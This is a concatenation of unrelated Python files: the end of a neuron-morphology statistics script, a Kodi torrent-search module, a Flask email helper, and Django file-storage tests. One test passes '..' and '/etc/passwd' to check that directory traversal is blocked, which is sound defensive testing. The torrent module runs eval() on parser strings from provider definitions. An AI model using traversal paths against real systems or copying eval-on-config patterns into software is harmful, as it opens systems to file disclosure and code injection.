pathSoma += branch["distSoma"]
cubeStats[arrrayIndex] = {
"length": length,
"boutons": boutons,
"branches": numBranches,
"pathSoma": pathSoma
}
for k in range(0, numRealizations):
multiplicity = multiplicities[k][nid]
if(multiplicity):
lengthArray = outProps["lengthArrays"][k]
lengthArrayLock = outProps["lengthArrayLocks"][k]
contributingArray = outProps["contributingArrays"][k]
contributingArrayLock = outProps["contributingArrayLocks"][k]
boutonArray = outProps["boutonArrays"][k]
boutonArrayLock = outProps["boutonArrayLocks"][k]
branchesArray = outProps["branchesArrays"][k]
branchesArrayLock = outProps["branchesArrayLocks"][k]
pathSomaArray = outProps["pathSomaArrays"][k]
pathSomaArrayLock = outProps["pathSomaArrayLocks"][k]
cellTypeArray = outProps["cellTypeArrays"][k]
cellTypeArrayLock = outProps["cellTypeArrayLocks"][k]
lengthArrayLock.acquire()
for arrayIndex, stats in cubeStats.items():
lengthArray[arrayIndex] += multiplicity * stats["length"]
lengthArrayLock.release()
contributingArrayLock.acquire()
for arrayIndex, stats in cubeStats.items():
contributingArray[arrayIndex] += multiplicity
contributingArrayLock.release()
boutonArrayLock.acquire()
for arrayIndex, stats in cubeStats.items():
boutonArray[arrayIndex] += multiplicity * stats["boutons"]
boutonArrayLock.release()
branchesArrayLock.acquire()
for arrayIndex, stats in cubeStats.items():
branchesArray[arrayIndex] += multiplicity * stats["branches"]
branchesArrayLock.release()
pathSomaArrayLock.acquire()
for arrayIndex, stats in cubeStats.items():
pathSomaArray[arrayIndex] += multiplicity * stats["pathSoma"]
pathSomaArrayLock.release()
cellTypeArrayLock.acquire()
for arrayIndex, stats in cubeStats.items():
intRep = cellTypeArray[arrayIndex]
cellTypeArray[arrayIndex] = setCellType(intRep, cellType)
cellTypeArrayLock.release()
if((i+1) % 50 == 0):
print("batch {}: processed {}/{}".format(batchIndex, i+1, len(nids)))
def computeCubeStats(networkDir, outfolder, nids, numMorphologies, realizations, synapticSide, numWorkers, outProps):
batches = np.array_split(nids, numWorkers)
clearArrays(outProps)
processes = []
for i in range(0, len(batches)):
p = mp.Process(target=registerCubeStatsBatch, args=(i, outProps, networkDir, batches[i], realizations, synapticSide))
p.start()
processes.append(p)
for p in processes:
p.join()
writeCubeStats(outfolder, numMorphologies, len(realizations), outProps, synapticSide)
def filterExc(nids, neurons):
nidsFiltered = []
for nid in nids:
if(neurons[nid]["cell_type"] != 11):
nidsFiltered.append(nid)
return nidsFiltered
def getGridBounds_ref_volume(networkDir):
boxMin, boxMax = constants.getReferenceVolume()
util_geometry.setGridSize("50-50-50")
gridBounds = util_geometry.getGridBounds(boxMin, boxMax)
return gridBounds
def printUsageAndExit():
print("eval_variability.py network-dir mode [num-workers]")
print()
exit()
if __name__ == "__main__":
numArgs = len(sys.argv)
if(numArgs not in [3, 4]):
printUsageAndExit()
networkDir = sys.argv[1]
mode = sys.argv[2]
if(numArgs == 4):
numWorkers = int(sys.argv[3])
else:
numWorkers = mp.cpu_count()
maxNumRealizations = 500
util.makeDir(os.path.join(networkDir, "eval"))
outfolder = os.path.join(networkDir, "eval", "variability")
util.makeDir(outfolder)
batchFolder = os.path.join(outfolder, mode)
util.makeCleanDir(batchFolder)
morphologyFile = os.path.join(outfolder, "morphology_mapping.csv")
if(not os.path.exists(morphologyFile)):
createMorphologyFile(networkDir, morphologyFile)
neurons = util_meta.loadNeuronProps(os.path.join(networkDir, "neurons.csv"))
regions = util_meta.loadRegions(os.path.join(networkDir, "regions.csv"))
if(mode == "pre"):
nids = np.loadtxt(os.path.join(networkDir, "innervating_ref-volume_{}.txt".format("pre")), dtype=int)
nids = filterExc(nids, neurons)
elif(mode == "post"):
nids = np.loadtxt(os.path.join(networkDir, "innervating_ref-volume_{}.txt".format("post")), dtype=int)
nids = filterExc(nids, neurons)
else:
raise ValueError(mode)
column_celltype_morphology, neuron_morphology, maxMorphologies, nidsFiltered = createMorphologyIndex(morphologyFile, nids, neurons, regions, mode)
print(mode, len(nids), len(nidsFiltered), "max morphologies", maxMorphologies)
# init shared arrays
gridBounds = getGridBounds_ref_volume(networkDir)
print("gridBouds", gridBounds)
outProps = {
"gridBounds": gridBounds,
"lengthArrays": [],
"lengthArrayLocks": [],
"contributingArrays": [],
"contributingArrayLocks": [],
"boutonArrays": [],
"boutonArrayLocks": [],
"branchesArrays": [],
"branchesArrayLocks": [],
"pathSomaArrays": [],
"pathSomaArrayLocks": [],
"cellTypeArrays": [],
"cellTypeArrayLocks": []
}
initArrays(outProps, maxNumRealizations)
for numMorphologies in range(1, maxMorphologies + 1):
realizations = generateMultiplicitiesForNumMorphologies(nidsFiltered, neurons, column_celltype_morphology, neuron_morphology, numMorphologies, maxMorphologies, maxNumRealizations)
computeCubeStats(networkDir, batchFolder, nidsFiltered, numMorphologies, realizations, mode, numWorkers, outProps)
|
burst.py
|
# -*- coding: utf-8 -*-
"""
Burst processing thread
"""
from __future__ import unicode_literals
from future.utils import PY3, iteritems
import re
import json
import time
from threading import Thread
from elementum.provider import append_headers, get_setting, log
if PY3:
from queue import Queue
from urllib.parse import urlparse
from urllib.parse import unquote
basestring = str
long = int
else:
from Queue import Queue
from urlparse import urlparse
from urllib import unquote
from .parser.ehp import Html
from kodi_six import xbmc, xbmcgui, xbmcaddon, py2_encode
from .provider import process
from .providers.definitions import definitions, longest
from .filtering import apply_filters, Filtering
from .client import USER_AGENT, Client
from .utils import ADDON_ICON, notify, translation, sizeof, get_icon_path, get_enabled_providers, get_alias
provider_names = []
provider_results = []
available_providers = 0
request_time = time.time()
auto_timeout = get_setting("auto_timeout", bool)
timeout = get_setting("timeout", int)
special_chars = "()\"':.[]<>/\\?"
elementum_timeout = 0
elementum_addon = xbmcaddon.Addon(id='plugin.video.elementum')
if elementum_addon:
if elementum_addon.getSetting('custom_provider_timeout_enabled') == "true":
elementum_timeout = int(elementum_addon.getSetting('custom_provider_timeout'))
else:
elementum_timeout = 30
log.info("Using timeout from Elementum: %d seconds" % (elementum_timeout))
# Make sure timeout is always less than the one from Elementum.
if auto_timeout:
timeout = elementum_timeout - 3
elif elementum_timeout > 0 and timeout > elementum_timeout - 3:
log.info("Redefining timeout to be less than Elementum's: %d to %d seconds" % (timeout, elementum_timeout - 3))
timeout = elementum_timeout - 3
def search(payload, method="general"):
""" Main search entrypoint
Args:
payload (dict): Search payload from Elementum.
method (str): Type of search, can be ``general``, ``movie``, ``show``, ``season`` or ``anime``
Returns:
list: All filtered results in the format Elementum expects
"""
log.debug("Searching with payload (%s): %s" % (method, repr(payload)))
if method == 'general':
if 'query' in payload:
payload['title'] = payload['query']
payload['titles'] = {
'source': payload['query']
}
else:
payload = {
'title': payload,
'titles': {
'source': payload
},
}
payload['titles'] = dict((k.lower(), v) for k, v in iteritems(payload['titles']))
# If titles[] exists in payload and there are special chars in titles[source]
# then we set a flag to possibly modify the search query
payload['has_special'] = 'titles' in payload and \
bool(payload['titles']) and \
'source' in payload['titles'] and \
any(c in payload['titles']['source'] for c in special_chars)
if payload['has_special']:
log.debug("Query title contains special chars, so removing any quotes in the search query")
if 'proxy_url' not in payload:
payload['proxy_url'] = ''
if 'internal_proxy_url' not in payload:
payload['internal_proxy_url'] = ''
if 'elementum_url' not in payload:
payload['elementum_url'] = ''
if 'silent' not in payload:
payload['silent'] = False
if 'skip_auth' not in payload:
payload['skip_auth'] = False
global request_time
global provider_names
global provider_results
global available_providers
provider_names = []
provider_results = []
available_providers = 0
request_time = time.time()
providers = get_enabled_providers(method)
if len(providers) == 0:
if not payload['silent']:
notify(translation(32060), image=get_icon_path())
log.error("No providers enabled")
return []
log.info("Burstin' with %s" % ", ".join([definitions[provider]['name'] for provider in providers]))
if get_setting('kodi_language', bool):
kodi_language = xbmc.getLanguage(xbmc.ISO_639_1)
if not kodi_language:
log.warning("Kodi returned empty language code...")
elif 'titles' not in payload or not payload['titles']:
log.info("No translations available...")
elif payload['titles'] and kodi_language not in payload['titles']:
log.info("No '%s' translation available..." % kodi_language)
p_dialog = xbmcgui.DialogProgressBG()
if not payload['silent']:
p_dialog.create('Elementum [COLOR FFFF6B00]Burst[/COLOR]', translation(32061))
for provider in providers:
available_providers += 1
provider_names.append(definitions[provider]['name'])
task = Thread(target=run_provider, args=(provider, payload, method))
task.start()
providers_time = time.time()
total = float(available_providers)
# Exit if all providers have returned results or timeout reached, check every 100ms
while time.time() - providers_time < timeout and available_providers > 0:
timer = time.time() - providers_time
log.debug("Timer: %ds / %ds" % (timer, timeout))
if timer > timeout:
break
message = translation(32062) % available_providers if available_providers > 1 else translation(32063)
if not payload['silent']:
p_dialog.update(int((total - available_providers) / total * 100), message=message)
time.sleep(0.25)
if not payload['silent']:
p_dialog.close()
del p_dialog
if available_providers > 0:
message = ', '.join(provider_names)
message = message + translation(32064)
log.warning(message)
if not payload['silent']:
notify(message, ADDON_ICON)
log.debug("all provider_results: %s" % repr(provider_results))
filtered_results = apply_filters(provider_results)
log.debug("all filtered_results: %s" % repr(filtered_results))
log.info("Providers returned %d results in %s seconds" % (len(filtered_results), round(time.time() - request_time, 2)))
return filtered_results
def got_results(provider, results):
""" Results callback once a provider found all its results, or not
Args:
provider (str): The provider ID
results (list): The list of results
"""
global provider_names
global provider_results
global available_providers
definition = definitions[provider]
definition = get_alias(definition, get_setting("%s_alias" % provider))
max_results = get_setting('max_results', int)
sort_by = get_setting('sort_by', int)
# 0 "Resolution"
# 1 "Seeds"
# 2 "Size"
# 3 "Balanced"
if not sort_by or sort_by == 3:
# TODO: think of something interesting to balance sort results
sorted_results = sorted(results, key=lambda r: (r['sort_balance']), reverse=True)
elif sort_by == 0:
sorted_results = sorted(results, key=lambda r: (r['sort_resolution']), reverse=True)
elif sort_by == 1:
sorted_results = sorted(results, key=lambda r: (r['seeds']), reverse=True)
elif sort_by == 2:
sorted_results = sorted(results, key=lambda r: (r['size']), reverse=True)
if len(sorted_results) > max_results:
sorted_results = sorted_results[:max_results]
log.info("[%s] >> %s returned %2d results in %.1f seconds%s" % (
provider, definition['name'].rjust(longest), len(results), round(time.time() - request_time, 2),
(", sending %d best ones" % max_results) if len(results) > max_results else ""))
provider_results.extend(sorted_results)
available_providers -= 1
if definition['name'] in provider_names:
provider_names.remove(definition['name'])
def extract_torrents(provider, client):
""" Main torrent extraction generator for non-API based providers
Args:
provider (str): Provider ID
client (Client): Client class instance
Yields:
tuple: A torrent result
"""
definition = definitions[provider]
definition = get_alias(definition, get_setting("%s_alias" % provider))
log.debug("[%s] Extracting torrents from %s using definitions: %s" % (provider, provider, repr(definition)))
if not client.content:
if get_setting("use_debug_parser", bool):
log.debug("[%s] Parser debug | Page content is empty" % provider)
raise StopIteration
dom = Html().feed(client.content)
key_search = get_search_query(definition, "key")
row_search = get_search_query(definition, "row")
name_search = get_search_query(definition, "name")
torrent_search = get_search_query(definition, "torrent")
info_hash_search = get_search_query(definition, "infohash")
size_search = get_search_query(definition, "size")
seeds_search = get_search_query(definition, "seeds")
peers_search = get_search_query(definition, "peers")
referer_search = get_search_query(definition, "referer")
log.debug("[%s] Parser: %s" % (provider, repr(definition['parser'])))
q = Queue()
threads = []
needs_subpage = 'subpage' in definition and definition['subpage']
if needs_subpage:
def extract_subpage(q, name, torrent, size, seeds, peers, info_hash, referer):
try:
log.debug("[%s] Getting subpage at %s" % (provider, repr(torrent)))
except Exception as e:
import traceback
log.error("[%s] Subpage logging failed with: %s" % (provider, repr(e)))
map(log.debug, traceback.format_exc().split("\n"))
# New client instance, otherwise it's race conditions all over the place
subclient = Client()
subclient.passkey = client.passkey
headers = {}
if "subpage_mode" in definition:
if definition["subpage_mode"] == "xhr":
headers['X-Requested-With'] = 'XMLHttpRequest'
headers['Content-Language'] = ''
if referer:
headers['Referer'] = referer
uri = torrent.split('|') # Split cookies for private trackers
subclient.open(py2_encode(uri[0]), headers=headers)
if 'bittorrent' in subclient.headers.get('content-type', ''):
log.debug('[%s] bittorrent content-type for %s' % (provider, repr(torrent)))
if len(uri) > 1: # Stick back cookies if needed
torrent = '%s|%s' % (torrent, uri[1])
else:
try:
torrent = extract_from_page(provider, subclient.content)
if torrent and not torrent.startswith('magnet') and len(uri) > 1: # Stick back cookies if needed
torrent = '%s|%s' % (torrent, uri[1])
except Exception as e:
import traceback
log.error("[%s] Subpage extraction for %s failed with: %s" % (provider, repr(uri[0]), repr(e)))
map(log.debug, traceback.format_exc().split("\n"))
log.debug("[%s] Subpage torrent for %s: %s" % (provider, repr(uri[0]), torrent))
ret = (name, info_hash, torrent, size, seeds, peers)
q.put_nowait(ret)
if not dom:
if get_setting("use_debug_parser", bool):
log.debug("[%s] Parser debug | Could not parse DOM from page content" % provider)
raise StopIteration
if get_setting("use_debug_parser", bool):
log.debug("[%s] Parser debug | Page content: %s" % (provider, client.content.replace('\r', '').replace('\n', '')))
key = eval(key_search) if key_search else ""
if key_search and get_setting("use_debug_parser", bool):
key_str = key.__str__()
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'key', key_search, key_str.replace('\r', '').replace('\n', '')))
items = eval(row_search)
if get_setting("use_debug_parser", bool):
log.debug("[%s] Parser debug | Matched %d items for '%s' query '%s'" % (provider, len(items), 'row', row_search))
for item in items:
if get_setting("use_debug_parser", bool):
item_str = item.__str__()
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'row', row_search, item_str.replace('\r', '').replace('\n', '')))
if not item:
continue
try:
name = eval(name_search) if name_search else ""
torrent = eval(torrent_search) if torrent_search else ""
size = eval(size_search) if size_search else ""
seeds = eval(seeds_search) if seeds_search else ""
peers = eval(peers_search) if peers_search else ""
info_hash = eval(info_hash_search) if info_hash_search else ""
referer = eval(referer_search) if referer_search else ""
if 'magnet:?' in torrent:
torrent = torrent[torrent.find('magnet:?'):]
if get_setting("use_debug_parser", bool):
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'name', name_search, name))
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'torrent', torrent_search, torrent))
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'size', size_search, size))
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'seeds', seeds_search, seeds))
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'peers', peers_search, peers))
if info_hash_search:
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'info_hash', info_hash_search, info_hash))
if referer_search:
log.debug("[%s] Parser debug | Matched '%s' iteration for query '%s': %s" % (provider, 'info_hash', referer_search, referer))
# Pass client cookies with torrent if private
if not torrent.startswith('magnet'):
user_agent = USER_AGENT
if client.passkey:
torrent = torrent.replace('PASSKEY', client.passkey)
elif client.token:
headers = {'Authorization': client.token, 'User-Agent': user_agent}
log.debug("[%s] Appending headers: %s" % (provider, repr(headers)))
torrent = append_headers(torrent, headers)
log.debug("[%s] Torrent with headers: %s" % (provider, repr(torrent)))
else:
parsed_url = urlparse(torrent.split('|')[0])
cookie_domain = '{uri.netloc}'.format(uri=parsed_url)
cookie_domain = re.sub('www\d*\.', '', cookie_domain)
cookies = []
for cookie in client._cookies:
if cookie_domain in cookie.domain:
cookies.append(cookie)
headers = {}
if cookies:
headers = {'User-Agent': user_agent}
log.debug("[%s] Cookies res: %s / %s" % (provider, repr(headers), repr(client.request_headers)))
if client.request_headers:
headers.update(client.request_headers)
if client.url:
headers['Referer'] = client.url
headers['Origin'] = client.url
# Need to set Cookie afterwards to avoid rewriting it with session Cookies
headers['Cookie'] = ";".join(["%s=%s" % (c.name, c.value) for c in cookies])
else:
headers = {'User-Agent': user_agent}
torrent = append_headers(torrent, headers)
if name and torrent and needs_subpage and not torrent.startswith('magnet'):
if not torrent.startswith('http'):
torrent = definition['root_url'] + py2_encode(torrent)
t = Thread(target=extract_subpage, args=(q, name, torrent, size, seeds, peers, info_hash, referer))
threads.append(t)
else:
yield (name, info_hash, torrent, size, seeds, peers)
except Exception as e:
log.error("[%s] Got an exception while parsing results: %s" % (provider, repr(e)))
if needs_subpage:
log.debug("[%s] Starting subpage threads..." % provider)
for t in threads:
t.start()
for t in threads:
t.join()
for i in range(q.qsize()):
ret = q.get_nowait()
log.debug("[%s] Queue %d got: %s" % (provider, i, repr(ret)))
yield ret
def extract_from_api(provider, client):
""" Main API parsing generator for API-based providers
An almost clever API parser, mostly just for YTS, RARBG and T411
Args:
provider (str): Provider ID
client (Client): Client class instance
Yields:
tuple: A torrent result
"""
try:
data = json.loads(client.content)
except:
data = []
log.debug("[%s] JSON response from API: %s" % (unquote(provider), repr(data)))
definition = definitions[provider]
definition = get_alias(definition, get_setting("%s_alias" % provider))
api_format = definition['api_format']
results = []
# If 'results' is empty - then we can try to take all the data as an array of results.
# Usable when api returns results without any other data.
if not api_format['results']:
results = data
else:
result_keys = api_format['results'].split('.')
log.debug("[%s] result_keys: %s" % (provider, repr(result_keys)))
for key in result_keys:
if key in data:
data = data[key]
else:
data = []
results = data
log.debug("[%s] results: %s" % (provider, repr(results)))
if 'subresults' in api_format:
from copy import deepcopy
for result in results: # A little too specific to YTS but who cares...
result['name'] = result[api_format['name']]
subresults = []
subresults_keys = api_format['subresults'].split('.')
for key in subresults_keys:
for result in results:
if key in result:
for subresult in result[key]:
sub = deepcopy(result)
sub.update(subresult)
subresults.append(sub)
results = subresults
log.debug("[%s] with subresults: %s" % (provider, repr(results)))
for result in results:
if not result or not isinstance(result, dict):
continue
name = ''
info_hash = ''
torrent = ''
size = ''
seeds = ''
peers = ''
if 'name' in api_format:
name = result[api_format['name']]
if 'description' in api_format:
if name:
name += ' '
name += result[api_format['description']]
if 'torrent' in api_format:
torrent = result[api_format['torrent']]
if 'download_path' in definition:
torrent = definition['base_url'] + definition['download_path'] + torrent
if client.token:
user_agent = USER_AGENT
headers = {'Authorization': client.token, 'User-Agent': user_agent}
log.debug("[%s] Appending headers: %s" % (provider, repr(headers)))
torrent = append_headers(torrent, headers)
log.debug("[%s] Torrent with headers: %s" % (provider, repr(torrent)))
if 'info_hash' in api_format:
info_hash = result[api_format['info_hash']]
if 'quality' in api_format: # Again quite specific to YTS...
name = "%s - %s" % (name, result[api_format['quality']])
if 'size' in api_format:
size = result[api_format['size']]
if isinstance(size, (long, int)):
size = sizeof(size)
elif isinstance(size, basestring) and size.isdigit():
size = sizeof(int(size))
if 'seeds' in api_format:
seeds = result[api_format['seeds']]
if isinstance(seeds, basestring) and seeds.isdigit():
seeds = int(seeds)
if 'peers' in api_format:
peers = result[api_format['peers']]
if isinstance(peers, basestring) and peers.isdigit():
peers = int(peers)
yield (name, info_hash, torrent, size, seeds, peers)
def extract_from_page(provider, content):
""" Sub-page extraction method
Args:
provider (str): Provider ID
content (str): Page content from Client instance
Returns:
str: Torrent or magnet link extracted from sub-page
"""
definition = definitions[provider]
definition = get_alias(definition, get_setting("%s_alias" % provider))
try:
matches = re.findall(r'magnet:\?[^\'"\s<>\[\]]+', content)
if matches:
result = matches[0]
log.debug('[%s] Matched magnet link: %s' % (provider, repr(result)))
return result
matches = re.findall('http(.*?).torrent["\']', content)
if matches:
result = 'http' + matches[0] + '.torrent'
result = result.replace('torcache.net', 'itorrents.org')
log.debug('[%s] Matched torrent link: %s' % (provider, repr(result)))
return result
matches = re.findall('/download\?token=[A-Za-z0-9%]+', content)
if matches:
result = definition['root_url'] + matches[0]
log.debug('[%s] Matched download link with token: %s' % (provider, repr(result)))
return result
matches = re.findall('"(/download/[A-Za-z0-9]+)"', content)
if matches:
result = definition['root_url'] + matches[0]
log.debug('[%s] Matched download link: %s' % (provider, repr(result)))
return result
matches = re.findall('/torrents/download/\?id=[a-z0-9-_.]+', content) # t411
if matches:
result = definition['root_url'] + matches[0]
log.debug('[%s] Matched download link with an ID: %s' % (provider, repr(result)))
return result
matches = re.findall('\: ([A-Fa-f0-9]{40})', content)
if matches:
result = "magnet:?xt=urn:btih:" + matches[0]
log.debug('[%s] Matched magnet info_hash search: %s' % (provider, repr(result)))
return result
matches = re.findall('/download.php\?id=([A-Za-z0-9]{40})\W', content)
if matches:
result = "magnet:?xt=urn:btih:" + matches[0]
log.debug('[%s] Matched download link: %s' % (provider, repr(result)))
return result
matches = re.findall('(/download.php\?id=[A-Za-z0-9]+[^\s\'"]*)', content)
if matches:
result = definition['root_url'] + matches[0]
log.debug('[%s] Matched download link: %s' % (provider, repr(result)))
return result
except:
pass
return None
def run_provider(provider, payload, method):
""" Provider thread entrypoint
Args:
provider (str): Provider ID
payload (dict): Search payload from Elementum
method (str): Type of search, can be ``general``, ``movie``, ``show``, ``season`` or ``anime``
"""
log.debug("[%s] Processing %s with %s method" % (provider, provider, method))
filterInstance = Filtering()
if method == 'movie':
filterInstance.use_movie(provider, payload)
elif method == 'season':
filterInstance.use_season(provider, payload)
elif method == 'episode':
filterInstance.use_episode(provider, payload)
elif method == 'anime':
filterInstance.use_anime(provider, payload)
else:
filterInstance.use_general(provider, payload)
if 'is_api' in definitions[provider]:
results = process(provider=provider, generator=extract_from_api, filtering=filterInstance, has_special=payload['has_special'], skip_auth=payload['skip_auth'])
else:
results = process(provider=provider, generator=extract_torrents, filtering=filterInstance, has_special=payload['has_special'], skip_auth=payload['skip_auth'])
got_results(provider, results)
def get_search_query(definition, key):
if 'parser' not in definition or key not in definition['parser']:
return ""
if key == 'key' or key == 'table' or key == 'row':
return "dom." + definition['parser'][key]
return definition['parser'][key]
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject, sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
tests.py
|
# -*- coding: utf-8 -*-
import os
import shutil
import sys
import tempfile
import time
from datetime import datetime, timedelta
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
try:
import threading
except ImportError:
import dummy_threading as threading
from django.conf import settings
from django.core.exceptions import SuspiciousOperation
from django.core.files.base import ContentFile, File
from django.core.files.images import get_image_dimensions
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import UploadedFile
from django.core.exceptions import ImproperlyConfigured
from django.utils import unittest
# Try to import PIL in either of the two ways it can end up installed.
# Checking for the existence of Image is enough for CPython, but
# for PyPy, you need to check for the underlying modules
try:
from PIL import Image, _imaging
except ImportError:
try:
import Image, _imaging
except ImportError:
Image = None
class GetStorageClassTests(unittest.TestCase):
def assertRaisesErrorWithMessage(self, error, message, callable,
*args, **kwargs):
self.assertRaises(error, callable, *args, **kwargs)
try:
callable(*args, **kwargs)
except error, e:
self.assertEqual(message, str(e))
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import don't exist.
"""
self.assertRaisesErrorWithMessage(
ImproperlyConfigured,
"NonExistingStorage isn't a storage module.",
get_storage_class,
'NonExistingStorage')
def test_get_nonexisting_storage_class(self):
"""
get_storage_class raises an error if the requested class don't exist.
"""
self.assertRaisesErrorWithMessage(
ImproperlyConfigured,
'Storage module "django.core.files.storage" does not define a '\
'"NonExistingStorage" class.',
get_storage_class,
'django.core.files.storage.NonExistingStorage')
def test_get_nonexisting_storage_module(self):
"""
get_storage_class raises an error if the requested module don't exist.
"""
# Error message may or may not be the fully qualified path.
self.assertRaisesRegexp(
ImproperlyConfigured,
('Error importing storage module django.core.files.non_existing_'
'storage: "No module named .*non_existing_storage"'),
get_storage_class,
'django.core.files.non_existing_storage.NonExistingStorage'
)
class FileStorageTests(unittest.TestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mktemp()
os.makedirs(self.temp_dir)
self.storage = self.storage_class(location=self.temp_dir,
base_url='/test_media_url/')
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.failIf(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assert_(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.failIf(self.storage.exists('storage_test'))
def test_file_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.failIf(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
atime = self.storage.accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(
os.path.getatime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.accessed_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_created_time(self):
"""
File storage returns a Datetime object for the creation time of
a file.
"""
self.failIf(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
ctime = self.storage.created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(
os.path.getctime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.created_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_modified_time(self):
"""
File storage returns a Datetime object for the last modified time of
a file.
"""
self.failIf(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
mtime = self.storage.modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(
os.path.getmtime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.modified_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.failIf(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assert_(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.failIf(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name),
os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the Web.
"""
self.assertEqual(self.storage.url('test.file'),
'%s%s' % (self.storage.base_url, 'test.file'))
self.storage.base_url = None
self.assertRaises(ValueError, self.storage.url, 'test.file')
def test_file_with_mixin(self):
"""
File storage can get a mixin to extend the functionality of the
returned file.
"""
self.failIf(self.storage.exists('test.file'))
class TestFileMixin(object):
mixed_in = True
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assert_(isinstance(
self.storage.open('test.file', mixin=TestFileMixin),
TestFileMixin
))
self.storage.delete('test.file')
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.failIf(self.storage.exists('storage_test_1'))
self.failIf(self.storage.exists('storage_test_2'))
self.failIf(self.storage.exists('storage_dir_1'))
f = self.storage.save('storage_test_1', ContentFile('custom content'))
f = self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
dirs, files = self.storage.listdir('')
self.assertEqual(set(dirs), set([u'storage_dir_1']))
self.assertEqual(set(files),
set([u'storage_test_1', u'storage_test_2']))
self.storage.delete('storage_test_1')
self.storage.delete('storage_test_2')
os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
self.assertRaises(SuspiciousOperation, self.storage.exists, '..')
self.assertRaises(SuspiciousOperation, self.storage.exists, '/etc/passwd')
class CustomStorage(FileSystemStorage):
def get_available_name(self, name):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
parts = name.split('.')
basename, ext = parts[0], parts[1:]
number = 2
while self.exists(name):
name = '.'.join([basename, str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class UnicodeFileNameTests(unittest.TestCase):
def test_unicode_file_names(self):
"""
Regression test for #8156: files with unicode names I can't quite figure
out the encoding situation between doctest and this file, but the actual
repr doesn't matter; it just shouldn't return a unicode object.
"""
uf = UploadedFile(name=u'¿Cómo?',content_type='text')
self.assertEqual(type(uf.__repr__()), str)
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super(ContentFile, self).chunks()
class FileSaveRaceConditionTest(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile("Data"))
def test_race_condition(self):
self.thread.start()
name = self.save_file('conflict')
self.thread.join()
self.assert_(self.storage.exists('conflict'))
self.assert_(self.storage.exists('conflict_1'))
self.storage.delete('conflict')
self.storage.delete('conflict_1')
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.old_perms = settings.FILE_UPLOAD_PERMISSIONS
